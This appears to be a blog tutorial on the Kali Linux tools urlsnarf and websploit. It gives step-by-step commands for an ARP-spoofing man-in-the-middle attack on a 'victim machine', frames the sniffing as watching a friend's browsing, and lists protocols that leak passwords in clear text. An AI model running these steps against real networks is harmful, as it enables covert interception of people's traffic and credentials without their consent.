URLSnarf - Kali Linux Tool used to Sniffing in Network



Urlsnarf outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool.

Urlsnarf outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.).

URLSnarf - Kali Linux Tool used to Sniffing in Network

URLSnarf - Kali Linux Tool used to Sniffing in Network


MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step 1: Need to install websploit in kali if not present.

root@kali:~# apt-get install websploit


Step 2: To Run the websploit

root@kali:~# websploit

Step 3: Next we need to list the modules with the websploit.

wsf > show modules


Step 4: Need to select network/mitm under Network modules.

wsf > use network/mitm
wsf:MITM > show options

Interface: Need to specify network adapter interface based on our network adapter.

set Interface eth0
set Interface wlan0

Router: Need to specify Router IP, can be found with the command route -n.

set Router (Gateway IP)

Target: Victim machine IP address, can be found with ipconfig for windows and ifconfig for Linux.

Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occurs after that sniffers will startup.

wsf:MITM > run

Step 6: Now go down to victim machine and start surfing, all the images would be captured by urlsnarf.


URLSnarf – Tool used to capture website links that your friend looking Online


Syntax

url snarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]

Example

akash@hackersTreeHouse:~$ sudo urlsnarf -i eth0 -v -p cap.pcap
url snarf: using cap.pcap [tcp port 80 or port 8080 or port 3128]
192.168.1.18 - - [16/Nov/2015:15:10:38 +0530] "GET http://192.168.1.6/img/for HTTP/1.1" - - "http://192.168.1.6/img/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
rc = -1
pcap_read_ex(): bogus savefile header

Protocols Vulnerable for Sniffing


HTTP: Sends passwords in clear text
TELNET: Transfer commands in plain text
SNMP: Sends passwords in clear text
POP: Sends passwords in clear text
FTP: Sends passwords in clear text
NNTP: Sends passwords in clear text
IMAP: Sends passwords in clear text

Here is Video Tutorial:


If you any doubt please don’t hesitate to leave a comment.

Also Read:



www.CodeNirvana.in

Copyright © Hackers TreeHouse | Designed By Code Nirvana